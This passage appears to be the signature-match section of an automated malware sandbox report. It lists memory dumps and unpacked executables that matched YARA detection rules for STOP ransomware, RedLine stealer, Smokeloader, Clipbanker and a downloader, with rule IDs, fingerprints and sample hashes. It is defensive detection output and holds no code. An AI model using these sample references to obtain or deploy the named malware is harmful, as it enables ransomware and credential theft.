                Source: 34.2.3971.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 15.2.F42F.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 15.2.F42F.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 31.2.3971.exe.39215a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 31.2.3971.exe.39215a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 20.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 20.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 6.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 6.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 5.2.9721.exe.39215a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 5.2.9721.exe.39215a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 11.2.F42F.exe.38a15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 11.2.F42F.exe.38a15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 26.2.9721.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 26.2.9721.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 11.2.F42F.exe.38a15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 11.2.F42F.exe.38a15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 20.2.9721.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 20.2.9721.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 22.2.6E6C.exe.39215a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 22.2.6E6C.exe.39215a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 29.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 29.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 23.2.6E6C.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 23.2.6E6C.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 9.2.46F.exe.38b15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 9.2.46F.exe.38b15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 27.2.9721.exe.38f15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 27.2.9721.exe.38f15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 22.2.6E6C.exe.39215a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 22.2.6E6C.exe.39215a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 35.2.9721.exe.39e15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 35.2.9721.exe.39e15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 6.2.9721.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 6.2.9721.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 9.2.46F.exe.38b15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 9.2.46F.exe.38b15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 19.2.9721.exe.38f15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 19.2.9721.exe.38f15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 28.0.E3B7.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
                Source: 00000004.00000002.631890597.0000000001CB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000024.00000002.694111730.000000000380C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 0000000B.00000002.650483753.0000000001DE5000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000026.00000000.689655808.0000000000AD1000.00000020.00000001.01000000.00000019.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
                Source: 00000026.00000000.689655808.0000000000AD1000.00000020.00000001.01000000.00000019.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
                Source: 00000004.00000002.631913891.0000000001CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000023.00000002.704356813.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000018.00000002.664592242.0000000001D16000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 0000000C.00000002.686813260.0000000003980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000007.00000002.636517473.0000000001BCB000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000013.00000002.655311852.000000000380D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 0000001E.00000002.691480155.0000000001B50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 0000001F.00000002.701349893.0000000001C93000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000023.00000002.703891224.000000000393F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000016.00000002.660464369.0000000003920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 0000001E.00000002.692909496.0000000001CE1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000016.00000002.659735922.0000000001E75000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000022.00000002.704302142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 00000022.00000002.704302142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000004.00000002.632080495.0000000001E61000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000008.00000002.640916155.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 00000008.00000002.640916155.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000009.00000002.648394809.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 0000001B.00000002.671423517.0000000003858000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000005.00000002.630815877.000000000388A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000002.569549766.0000000001B62000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
